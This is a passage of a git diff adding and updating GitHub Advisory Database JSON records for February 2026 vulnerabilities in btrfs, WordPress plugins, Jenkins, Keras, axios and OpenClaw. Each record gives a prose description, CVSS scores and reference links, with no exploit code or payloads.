kernel/exit.c:1121\n x64_sys_call+0x2210/0x2210 arch/x86/include/generated/asm/syscalls_64.h:232\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe8/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x44f639\n Code: Unable to access opcode bytes at 0x44f60f.\n RSP: 002b:00007ffc15c4e088 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\n RAX: ffffffffffffffda RBX: 00000000004c32f0 RCX: 000000000044f639\n RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000001\n RBP: 0000000000000001 R08: ffffffffffffffc0 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000246 R12: 00000000004c32f0\n R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \n\nSince rescue mount options will mark the full fs read-only, there should\nbe no new transaction triggered.\n\nBut during unmount we will evict all inodes, which can trigger a new\ntransaction, and triggers warnings on a heavily corrupted fs.\n\n[CAUSE]\nBtrfs allows new transaction even on a read-only fs, this is to allow\nlog replay happen even on read-only mounts, just like what ext4/xfs do.\n\nHowever with rescue mount options, the fs is fully read-only and cannot\nbe remounted read-write, thus in that case we should also reject any new\ntransactions.\n\n[FIX]\nIf we find the fs has rescue mount options, we should treat the fs as\nerror, so that no new transaction can be started.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23214" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1972f44c189c8aacde308fa9284e474c1a5cbd9f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3228b2eceb6c3d7e237f8a5330113dbd164fb90d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a928eecf030a9a5dc5f5ca98332699f379b91963" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json new file mode 100644 index 0000000000000..16e327c5f4939 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw84-mx3m-hw5p/GHSA-vw84-mx3m-hw5p.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw84-mx3m-hw5p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1404" + ], + "details": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the filter parameters (e.g., 'filter_first_name') in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1404" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/assets/js/um-members.js#L515" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members.php#L348" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458086" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ba62b804-f101-4e29-8304-fb2b7dad333c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json new file mode 100644 index 0000000000000..30189cc7dbd4c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwcq-x7gx-g26f/GHSA-vwcq-x7gx-g26f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwcq-x7gx-g26f", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-8308" + ], + "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Key Software Solutions Inc. INFOREX- General Information Management System allows XSS Through HTTP Headers.This issue affects INFOREX- General Information Management System: from 2025 and before through 18022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8308" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json new file mode 100644 index 0000000000000..1ca49c2294cfa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhp-qgm8-5p5c", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-27100" + ], + "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27100" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2026-02-18/#SECURITY-3658" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json new file mode 100644 index 0000000000000..239db0c71b690 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whmh-gx62-v47m", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-59920" + ], + "details": "When hours are entered in time@work, version 7.0.5, it performs a query to display the projects assigned to the user. If the query URL is copied and opened in a new browser window, the ‘IDClient’ parameter is vulnerable to a blind authenticated SQL injection. If the request is made with the TWAdmin user with the sysadmin role enabled, exploiting the vulnerability will allow commands to be executed on the system; if the user does not belong to the sysadmin role, they will still be able to query data from the database.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59920" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-timework-systemswork" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json new file mode 100644 index 0000000000000..9baadc5170937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2g-h2h9-v8x3", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60038" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running Rexroth IndraWorks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60038" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json new file mode 100644 index 0000000000000..c7882935d1b95 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wvvh-pcq5-hc6f/GHSA-wvvh-pcq5-hc6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvvh-pcq5-hc6f", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33250" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33250" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json new file mode 100644 index 0000000000000..e9668086651a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ww2j-3p54-3m69/GHSA-ww2j-3p54-3m69.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww2j-3p54-3m69", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-8781" + ], + "details": "The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8781" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bookster/trunk/src/Models/Database/QueryBuilder.php#L133" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3434484" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json new file mode 100644 index 0000000000000..e42c5f8bdd069 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x536-g6fc-g963", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2464" + ], + "details": "Path traversal vulnerability in the AMR Printer Management 1.01 Beta web service, which allows remote attackers to read arbitrary files from the underlying Windows system by using specially crafted path traversal sequences in requests directed to the web management service. The service is accessible without authentication and runs with elevated privileges, amplifying the impact of the vulnerability. An attacker can exploit this condition to access sensitive and privileged files on the system using path traversal payloads. Successful exploitation of this vulnerability could lead to the unauthorized disclosure of internal system information, compromising the confidentiality of the affected environment.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2464" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-amr-printer-management-amr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file From 5c0e07c5b0bb7b24fb941ba52871385af18a7e3a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 16:11:57 +0000 Subject: [PATCH 007/174] Publish GHSA-xfhx-r7ww-5995 --- .../GHSA-xfhx-r7ww-5995.json | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json index 2911ab16e66df..98074e802f1ca 100644 --- a/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json +++ b/advisories/github-reviewed/2026/01/GHSA-xfhx-r7ww-5995/GHSA-xfhx-r7ww-5995.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-xfhx-r7ww-5995", - "modified": "2026-01-15T20:11:51Z", + "modified": "2026-02-18T16:08:35Z", "published": "2026-01-15T15:31:19Z", "aliases": [ "CVE-2026-0897" ], "summary": "Google Keras Allocates Resources Without Limits or Throttling in the HDF5 weight loading component", - "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", + "details": "Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.12.0 and 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.", "severity": [ { "type": "CVSS_V4", @@ -28,14 +28,11 @@ "introduced": "3.0.0" }, { - "fixed": "3.13.1" + "fixed": "3.12.1" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.13.0" - } + ] }, { "package": { @@ -47,17 +44,17 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "3.13.0" }, { - "fixed": "3.12.1" + "fixed": "3.13.1" } ] } ], - "database_specific": { - "last_known_affected_version_range": "<= 3.12.0" - } + "versions": [ + "3.13.0" + ] } ], "references": [ @@ -77,6 +74,10 @@ "type": "WEB", "url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6" }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb" + }, { "type": "PACKAGE", "url": "https://github.com/keras-team/keras" From 2e5cf78652535edad64ebb74d32eca54d553f9e7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:16:44 +0000 Subject: [PATCH 008/174] Publish GHSA-43fc-jf86-j433 --- .../GHSA-43fc-jf86-j433.json | 38 ++++++++++++++++++- 1 file changed, 36 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" From 0bb5d2b0ebfa02dc8ba10c97a461b9018a24ccaf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:39:15 +0000 Subject: [PATCH 009/174] Publish Advisories GHSA-gq9c-wg68-gwj2 GHSA-xwjm-j929-xq7c --- .../GHSA-gq9c-wg68-gwj2.json | 63 +++++++++++++++++ .../GHSA-xwjm-j929-xq7c.json | 68 +++++++++++++++++++ 2 files changed, 131 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json diff --git a/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json new file mode 100644 index 0000000000000..210f1edb3906b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-gq9c-wg68-gwj2/GHSA-gq9c-wg68-gwj2.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq9c-wg68-gwj2", + "modified": "2026-02-18T17:38:39Z", + "published": "2026-02-18T17:38:39Z", + "aliases": [], + "summary": "OpenClaw has a path traversal in browser trace/download output paths may allow arbitrary file writes", + "details": "## Summary\n\n OpenClaw’s browser control API accepted user-supplied output paths for trace/download files without consistently\n constraining writes to OpenClaw-managed temporary directories.\n\n ## Impact\n\n If an attacker can access the browser control API, they could attempt to write trace/download output files outside\n intended temp roots, depending on process filesystem permissions.\n\n ## Affected versions\n\n `openclaw` `< 2026.2.13`\n\n ## Fixed versions\n\n `openclaw` `>= 2026.2.13`\n\n ## Remediation\n\n Upgrade to `2026.2.13` or later.\n\n ## What changed\n\n The fix constrains output paths for:\n\n - `POST /trace/stop`\n - `POST /wait/download`\n - `POST /download`\n\n All three now enforce OpenClaw temp-root boundaries and reject traversal/escape paths.\n\n ## Credits\n\n Thanks to Adnan Jakati (@jackhax) of Praetorian for responsible disclosure.\n\n Fix shipped in PR #15652 and merged to `main` on February 13, 2026 (`7f0489e4731c8d965d78d6eac4a60312e46a9426`).\n\n---\n\nFix commit 7f0489e4731c8d965d78d6eac4a60312e46a9426 confirmed on main and in v2026.2.14. Upgrade to `openclaw >= 2026.2.13`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gq9c-wg68-gwj2" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15652" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:38:39Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json new file mode 100644 index 0000000000000..cbafa16a3039d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwjm-j929-xq7c", + "modified": "2026-02-18T17:37:53Z", + "published": "2026-02-18T17:37:52Z", + "aliases": [ + "CVE-2026-26972" + ], + "summary": "OpenClaw has a Path Traversal in Browser Download Functionality", + "details": "### Summary\n\nOpenClaw browser download helpers accepted an unsanitized output path. When invoked via the browser control gateway routes, this allowed path traversal to write downloads outside the intended OpenClaw temp downloads directory.\n\nThis issue is not exposed via the AI agent tool schema (no `download` action). Exploitation requires authenticated CLI access or an authenticated gateway RPC token.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: >=2026.1.12, <=2026.2.12\n- Fixed: >=2026.2.13\n\n### Details\n\nAffected code: `src/browser/pw-tools-core.downloads.ts` (`waitForDownloadViaPlaywright`, `downloadViaPlaywright`).\n\nFixed entrypoints (as of 2026.2.13):\n- Gateway browser control routes `/wait/download` and `/download` now restrict `path` to `DEFAULT_DOWNLOAD_DIR` via `resolvePathWithinRoot`.\n\n### Fix Commit(s)\n\n- 7f0489e4731c8d965d78d6eac4a60312e46a9426\n\n### Mitigation\n\nUpgrade to `openclaw` >=2026.2.13.\n\nThanks @locus-x64 for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.12" + }, + { + "fixed": "2026.2.13" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.12" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xwjm-j929-xq7c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/7f0489e4731c8d965d78d6eac4a60312e46a9426" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:37:52Z", + "nvd_published_at": null + } +} \ No newline at end of file From 0083c7c33098b09fa9955cedbc145423abd69ad5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:41:32 +0000 Subject: [PATCH 010/174] Publish Advisories GHSA-4564-pvr2-qq4h GHSA-7rcp-mxpq-72pj --- .../GHSA-4564-pvr2-qq4h.json | 75 +++++++++++++++++++ .../GHSA-7rcp-mxpq-72pj.json | 63 ++++++++++++++++ 2 files changed, 138 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..48068a265fa55 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-18T17:39:00Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + 